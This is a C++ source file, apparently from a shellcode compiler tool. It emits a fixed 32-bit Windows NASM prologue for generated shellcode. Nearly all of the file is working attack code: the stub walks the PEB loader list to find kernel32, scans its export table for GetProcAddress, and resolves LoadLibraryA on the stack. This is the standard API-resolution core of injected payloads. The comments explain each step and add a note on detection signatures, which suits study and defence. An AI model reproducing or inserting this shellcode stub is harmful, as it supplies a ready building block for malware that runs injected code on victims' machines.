#include "ASMHeader.h"
//-----------------------------------------------------------------------
// string ASMHeader::GetASMHeader()
// Returns the default NASM prologue that every generated shellcode starts
// with. According to its own emitted ";" comments the stub (32-bit Windows
// only, "BITS 32") reads the PEB via fs:[0x30], walks PEB->Ldr's in-memory
// module list to the third entry (assumed to be kernel32), scans kernel32's
// export name table for "GetProcAddress", and then uses it to resolve
// "LoadLibrary". State left for the code appended after this header:
// EBX = kernel32 base, EDX = GetProcAddress, ECX = 0, and LoadLibrary's
// address is the last value pushed on the stack (presumably consumed by the
// emitted code that follows - confirm against the callers).
// Detection note: the fs:[0x30] read, the loader-list walk and the
// "GetP"/"rocA"/"ddre" dword compares are well-known resolver signatures.
// The "third module is kernel32" assumption holds for a normally loaded
// process but is not guaranteed by the loader.
//-----------------------------------------------------------------------
string ASMHeader::GetASMHeader()
{
    // The header is a compile-time constant and is emitted verbatim: every
    // line keeps its trailing space and CRLF exactly as written here.
    static const char kDefaultHeader[] =
        // Banner, target and entry point.
        "; Shellcode generated using Shellcode Compiler \r\n"
        "; https://github.com/NytroRST/ShellcodeCompiler \r\n\r\n"
        "BITS 32 \r\n"
        "SECTION .text \r\n"
        "global main \r\n"
        "main: \r\n\r\n"
        // Locate kernel32 through the PEB loader list (ECX is zeroed so the
        // fs-relative load has no displacement dependency on ECX).
        "xor ecx, ecx \r\n"
        "mov eax, [fs:ecx + 0x30] ; EAX = PEB \r\n"
        "mov eax, [eax + 0xc] ; EAX = PEB->Ldr \r\n"
        "mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder \r\n"
        "lodsd ; EAX = Second module \r\n"
        "xchg eax, esi ; EAX = ESI, ESI = EAX \r\n"
        "lodsd ; EAX = Third(kernel32) \r\n"
        "mov ebx, [eax + 0x10] ; EBX = Base address \r\n"
        // Walk the PE headers to the export directory and its name table.
        "mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew \r\n"
        "add edx, ebx ; EDX = PE Header \r\n"
        "mov edx, [edx + 0x78] ; EDX = Offset export table \r\n"
        "add edx, ebx ; EDX = Export table \r\n"
        "mov esi, [edx + 0x20] ; ESI = Offset namestable \r\n"
        "add esi, ebx ; ESI = Names table \r\n"
        // Emitted comment says "EXC"; that is a typo for ECX, kept verbatim.
        "xor ecx, ecx ; EXC = 0 \r\n\r\n"
        // Scan exported names until the 12-byte prefix "GetProcAddre" matches;
        // ECX counts names (1-based) and becomes the index into the ordinals.
        "Get_Function: \r\n\r\n"
        "inc ecx ; Increment the ordinal \r\n"
        "lodsd ; Get name offset \r\n"
        "add eax, ebx ; Get function name \r\n"
        "cmp dword [eax], 0x50746547 ; GetP \r\n"
        "jnz Get_Function \r\n"
        "cmp dword [eax + 0x4], 0x41636f72 ; rocA \r\n"
        "jnz Get_Function \r\n"
        "cmp dword [eax + 0x8], 0x65726464 ; ddre \r\n"
        "jnz Get_Function \r\n"
        // Ordinals are 16-bit, so only CX is overwritten; the upper half of
        // ECX is the scan counter's upper half (zero unless > 65535 names).
        "mov esi, [edx + 0x24] ; ESI = Offset ordinals \r\n"
        "add esi, ebx ; ESI = Ordinals table \r\n"
        "mov cx, [esi + ecx * 2] ; Number of function \r\n"
        "dec ecx \r\n"
        "mov esi, [edx + 0x1c] ; Offset address table \r\n"
        "add esi, ebx ; ESI = Address table \r\n"
        "mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) \r\n"
        "add edx, ebx ; EDX = GetProcAddress \r\n\r\n"
        // Build the NUL-terminated "LoadLibraryA" string on the stack
        // (pushed ECX = 0 supplies the terminator) and call
        // GetProcAddress(kernel32, "LoadLibraryA").
        "xor ecx, ecx ; ECX = 0 \r\n"
        "push ebx ; Kernel32 base address \r\n"
        "push edx ; GetProcAddress \r\n"
        "push ecx ; 0 \r\n"
        "push 0x41797261 ; aryA \r\n"
        "push 0x7262694c ; Libr \r\n"
        "push 0x64616f4c ; Load \r\n"
        "push esp ; LoadLibrary \r\n"
        "push ebx ; Kernel32 base address \r\n"
        "call edx ; GetProcAddress(LL) \r\n\r\n"
        // Discard the 12-byte string, restore ECX = 0, and leave the
        // LoadLibrary address on top of the stack for the following code.
        "add esp, 0xc ; pop LoadLibrary \r\n"
        "pop ecx ; ECX = 0 \r\n"
        "push eax ; EAX = LoadLibrary \r\n\r\n";

    return string(kDefaultHeader);
}